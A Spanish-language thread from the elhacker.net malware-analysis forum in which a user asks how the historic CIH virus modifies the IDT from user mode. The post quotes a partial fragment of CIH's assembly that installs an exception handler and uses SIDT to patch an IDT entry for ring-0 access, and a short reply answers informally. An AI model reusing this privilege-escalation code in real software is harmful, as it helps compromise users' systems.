elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Instruccion SIDT y el virus CIH.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Instruccion SIDT y el virus CIH.  (Leído 555 veces)
marax

Desconectado Desconectado

Mensajes: 192


Women; an alias for "Fully-automatic weapon."


Ver Perfil
Instruccion SIDT y el virus CIH.
« en: 9 Agosto 2020, 14:32 pm »

Hola,
Tengo una duda un poco tonta que me esta rompiendo la cabeza... el virus CIH, para obtener privilegios del sistema, altera la IDT y modifica la entrada de una excepcion que luego ocasiona. Sin embargo, ¿no son, tanto las instrucciones SIDT y LIDT privilegiadas de antemano? es decir, ¿como el virus accede a la IDT cuando es un simple EXE en modo usuario?:

Citar
MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ;
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

;...
En línea

"Durante diez años has venido a mi cueva: estarías harto de tu luz y de este camino sin mí, sin mi águila y sin mi serpiente."
el etrno

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Instruccion SIDT y el virus CIH.
« Respuesta #1 en: 6 Septiembre 2020, 04:32 am »

la respuesta corta el windows en los que cih sirve tiene mas hoyos de seguridad que un colador por lo que era posible saltarse ciertos controles y toquetear cosa con permisos de administrador y asta de sistema sin tener privilegios es similar a lo que se hace actualmente con la inyección dll solo que mas fácil no te preocupes por eso actualmente no se puede que yo recuerde
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Equivalencia C a ASM de una instrucción.
Electrónica
Meta 3 5,673 Último mensaje 19 Octubre 2008, 06:24 am
por MARCO_RECARGADO
se atasca en una instruccion
Java
Tyrz 9 4,492 Último mensaje 21 Enero 2011, 20:57 pm
por kasiko
Instrucción % en C++?
Programación General
.:UND3R:. 1 1,435 Último mensaje 17 Enero 2012, 16:49 pm
por pucheto
Instruccion if
Programación C/C++
BJM 3 1,202 Último mensaje 22 Octubre 2012, 17:48 pm
por rir3760
Instruccion sscanf [C]
Programación C/C++
oblivionxor 6 1,578 Último mensaje 26 Febrero 2013, 20:36 pm
por oblivionxor
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines